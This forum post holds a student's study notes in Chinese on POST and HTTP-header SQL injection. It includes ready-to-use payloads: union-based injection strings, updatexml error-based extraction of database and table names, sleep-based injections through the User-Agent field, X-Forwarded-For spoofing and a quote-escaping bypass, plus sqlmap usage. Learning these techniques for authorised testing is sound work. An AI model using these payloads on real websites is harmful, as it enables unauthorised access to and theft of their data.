笔记:POST/HEAD 注入

喜欢悠哉独自在   ·   发表于 2022-03-08 10:56:20   ·   学习杂记

一、前言

1、SQLmap -> SQL注入
2、Burpsuite -> 抓包、改包、放包的一个工具

二、上节课补充

1、常用浏览器

IE、火狐、谷歌浏览器、UC、360、QQ浏览器
(1)360浏览器:兼容模式(IE)极速模式(谷歌浏览器)
(2)IE用的很少(政府机关用得多)
(3)推进:火狐(插件)、谷歌(插件)
你现在想要浏览器有一个新的功能

2、常用插件

(1)Proxy SwitchySharp 浏览器的代理
你挂的是系统代理
(2)ModHeader 设置请求头
User_agent(UA)
Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; BLA-AL00 Build/HUAWEIBLA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132
MQQBrowser/8.9 Mobile Safari/537.36
(3)Charset_v0.5.2 改变页面编码
页面乱码的原因:编解码方式错误

三、今日内容

1、什么是POST注入

(1)POST -> 传参方式
(2)注入 -> 用户输入的数据被当做代码进行执行

2、GET注入

(显错注入、联合查询注入)
划分种类的方式有很多:
(1)性别:男生、女生
(2)体型:胖的、瘦的
(3)身高:高的、矮的

3、GET注入和POST注入

POST注入:POST传参所产生的注入就是POST注入(没有区别)
GET 和 POST传参的区别:数据本身(编码问题:URL编码)

4、注入语句分析

‘ or 1=1 order by 1 — qwe

‘ or 1=1 union select 1,2,3 limit 1,1 — qwe

select *from user where username = or 1=1 order by 1

select *from user where username =’’ or 1=1 order by 1

A条件 and B条件 [我全要]
A条件 or B条件 [满足一个就可以]

order by 1 [对结果集的排序]

select 1,2,3 from user

select 字段 from 表名

正常情况下。查工资:输出一行数据还是多行数据

select *from user where username =’’ and 1=2
union
select 1,2,3 limit 1,1 — qwe

“) and 1=2 union select 1,2,3 — qwe

5、POST SQLMAP

(1)—form (不稳)
(2) -r 指定数据包 (你想测试社区的发帖sql注入) Cookie 代表你的身份

闭合: ‘ “ ‘) “)

渗透测试 -> 试

四、HEAD注入

HEAD注入 => head传参 ($_SERVER)

1、127.0.0.1和localhost是抓不到包的

2、头信息可用被获取,获取之后就可以进行处理

insert into
网页登录 => 上次登录IP:xxxxx 上次登录设备:xxxxx

3、查询语句的目的:查询数据,展示给用户看

4、插入语句大部分没有回显(联合查询)、盲注、报错注入

5、报错注入

把你想得到的数据放在报错里面显示给你看

报错注入有很多函数

updatexml

updatexml(目标xml内容,xml文档路径,更新的内容)
路径不能出现特殊字符 ~ !#

updatexml(1,’!123’,1)

concat() 拼接字符串

updatexml(1,concat(‘!’,database()),1)

updatexml(1,concat(‘!’,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)
报错的结果一定是个字符串

6、如果你没有登录,你觉得网站会记录你的IP或者UA吗?

HEAD注入:登录成功、执行某个操作成功的那一下

7、常用账户名

admin、user、root、test、a、ceshi、jishu、system

五、语句分析

INSERT INTO uagent (uagent,username) VALUES (‘$uagent’,’$uname’)

‘ or sleep(10),1) — qwe
‘ or sleep(10)) — qwe

INSERT INTO uagent (uagent,username) VALUES (‘’ or updatexml(1,concat(‘!’,database()),1),1) — qwe

1、所有UA内容之前必须需要加个空格

2、UA:判断你的机器是什么情况

Referer:你从哪里哪里来

3、代理

我 -> 商家
我 -> A -> 商家
(代理不违法,翻墙是违法的)

透明代理:会告诉访问者真实的IP
高匿代理:不会告诉访问者真实的IP

A -> 网站 (负载均衡、CDN)
网站:图片、视频、log、固定的字体、前端页面
A -> 缓存服务器 -> 真实的网站

真实的网站想获取你的IP怎么办?
请求头:X-FORWORDED-FOR

4、开发开发网站,一个字一个字码出来?

ctrl + c
ctrl + v

mysqli_fetch_array
X-Forworded-For: 127.0.0.1
管理员账户

5、绕过单引号

select *from user where username =’\’ and password=’ admin’
\ 转译 (将代码变成字符串)

六、总结

1、插件
2、POST注入 -r —form
3、HEAD注入 (head传参 $_SERVER) 报错注入
4、UA REFERER X-FORWORDED-FOR
5、代理
6、回显。(插入语句没有回显)
7、\ 转译字符绕过’过滤的问题

打赏我,让我更有动力~

0 条回复   |  直到 2022-3-8 | 913 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.